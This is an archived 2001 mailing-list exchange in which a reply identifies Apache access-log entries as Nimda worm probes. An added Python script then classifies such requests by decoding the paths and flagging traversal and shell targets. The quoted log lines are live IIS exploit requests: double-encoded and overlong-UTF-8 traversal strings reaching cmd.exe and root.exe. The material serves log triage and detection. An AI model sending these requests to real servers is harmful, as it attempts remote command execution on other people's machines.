From: "Peter M. Nielsen"
Subject: RE: Apache access.log - (whats going on)
Date: Wed, 10 Oct 2001 12:13:29 +0200

Well, someone is trying to get the Nimda-virus to infect your machine.
Hopefully you're running a linux-thang

- Peter

Institut for Konjunktur-Analyse
Aabenraa 29 * DK-1124 København K
phone: (+45) 33 32 82 70 * fax: (+45) 33 93 03 67 * http://www.ifka.dk

> -----Original Message-----
> From: Lars Nielsen Lind [mailto:moonie@worldonline.dk]
> Sent: 10. oktober 2001 08:20
> To: tomcat-user@jakarta.apache.org
> Subject: Apache access.log - (whats going on)
>
> Hi.
>
> I have read my access.log (apache) and found several IPs as
> shown below. What's going on?
>
> /Lars Nielsen Lind
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
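
Added example, not part of the original thread: one way to triage an access.log for the kind of probes quoted above, by decoding each request path until it stops changing and grouping the indicators per client. The flag names and the functions classify() and scan() are this example's own, and the last sample line (192.0.2.10) is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

def classify(target, max_rounds=5):
    """Return the probe indicators found in the path of one request target."""
    data, rounds = target.partition("?")[0].encode(), 0
    for _ in range(max_rounds):              # percent-decode until stable
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    flags = set()
    if rounds >= 2:                          # an escape was itself escaped (%255c, %%35%63)
        flags.add("double-encoding")
    if b"\xc0" in data or b"\xc1" in data:   # 0xC0/0xC1 never occur in valid UTF-8
        flags.add("overlong-utf8")
    if re.search(rb"\.\.[/\\]", data):       # ../ or ..\ once everything is decoded
        flags.add("traversal")
    if re.search(rb"[/\\](?:cmd|root)\.exe$", data, re.I):
        flags.add("shell-target")
    return flags

def scan(lines):
    """Group flagged requests by client; 'served' counts responses below 400."""
    report = defaultdict(lambda: {"hits": 0, "served": 0, "flags": set()})
    for line in lines:
        m = LOG_RE.match(line)
        flags = classify(m.group(2)) if m else set()
        if flags:
            entry = report[m.group(1)]
            entry["hits"] += 1
            entry["served"] += int(m.group(3)) < 400
            entry["flags"] |= flags
    return dict(report)

# First four lines come from the log quoted above; the last one is constructed.
SAMPLE = [
    '62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"',
    '192.0.2.10 - - [10/Oct/2001:07:45:02 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
if __name__ == "__main__":
    for host, entry in scan(SAMPLE).items():
        print(host, entry["hits"], entry["served"], sorted(entry["flags"]))
```

A "served" count of 0, as with the 404 and 400 responses in the quoted log, means none of the flagged requests was answered with content; any non-zero value is the case to investigate first.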